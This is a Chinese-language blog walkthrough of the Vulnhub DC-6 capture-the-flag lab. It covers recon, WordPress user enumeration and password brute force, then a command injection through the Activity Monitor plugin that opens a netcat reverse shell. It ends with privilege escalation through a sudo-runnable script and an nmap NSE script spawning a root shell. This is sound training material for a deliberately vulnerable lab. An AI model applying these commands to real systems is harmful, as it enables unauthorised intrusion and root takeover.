DC-6-WordPress-nmap提权
Vulnhub简介
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。
靶场部署
这个挑战的最终目标是获得root权限并阅读唯一的flag
vulnhub官网:https://www.vulnhub.com
下载地址:https://www.vulnhub.com/entry/dc-6,315/
1、直接从官网下载做好的虚拟机镜像文件(推荐下载Mirror版本);
2、解压会得到一个.ova的文件,然后在VMware中打开即可;
信息收集
靶机官网给出的两个线索
需要去配置一下hosts文件
Kali里面的密码本
1.扫描局域网主机
arp-scan -l
2.端口探测
nmap -sV -p- 192.168.75.158
可以看到开放了22和80端口
直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件
Windows系统下在 C:\windows\system32\drivers\etc\hosts
打开后在末尾添加:192.168.75.158 wordy
Linux系统下在/etc/hosts
vim /etc/hosts
#添加
192.168.75.158 wordy
现在访问即可
是一个WordPress网站,Kali有专门的扫描工具wpscan
3.目录扫描
apt-get install dirsearch
dirsearch -u http://192.168.75.158
4.wpscan扫描用户
wpscan --url http://wordy/ -e u
找到五个用户
爆破
1、找到五个用户名:admin、graham、mark、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破
(作者在vulnhub上给了个提示,为了减少暴力破解的时间,需要将包含“k01”的字符串从字典里筛选出来作为新字典用)
vim dc-username.txt #将用户名放到其中
gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目录解压密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #将带有k01的密码导到dc-paswd.txt中
2、使用wpscan来爆破
wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt
找到mark的密码为:helpdesk01
登陆后台
http://wordy/wp-login.php
后台插件getshell
1、利用Activity monitor插件的rce漏洞来getshell
2、点击Activity monitor -> Tools
3、执行命令的同时使用burp抓包,发送到repeater模块
前端限制了只能填写15个字符,可以F12修改长度
反弹shell
Kali终端上:nc -lvvp 4444
burp抓包修改为:nc 192.168.75.150 4444 -e /bin/bash
获取一个稳定一点的shell终端
python -c 'import pty;pty.spawn("/bin/bash")'
切换用户
在/home/mark/stuff下发现一个文件,记录了用户graham的密码GSo7isUM1D4
成功切换到graham用户下
提权
先查看一下有没有suid提权,没有再使用sudo -l看一下可执行的命令
可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件
查看一下脚本内容
cat /home/jens/backups.sh
我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了
echo "/bin/bash" >> backups.sh
然后以jens用户执行
sudo -u jens ./backups.sh
已经切换到jens用户
再使用sudo -l查看一下可以执行的操作
发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了
echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell
知识点总结
- 信息收集
- wpscan工具的使用,枚举用户名,爆破登录
- WordPress插件activity monitor远程代码执行漏洞
- nmap提权
本文来自博客园,作者:NoCirc1e,转载请注明原文链接:https://www.cnblogs.com/NoCirc1e/p/18172795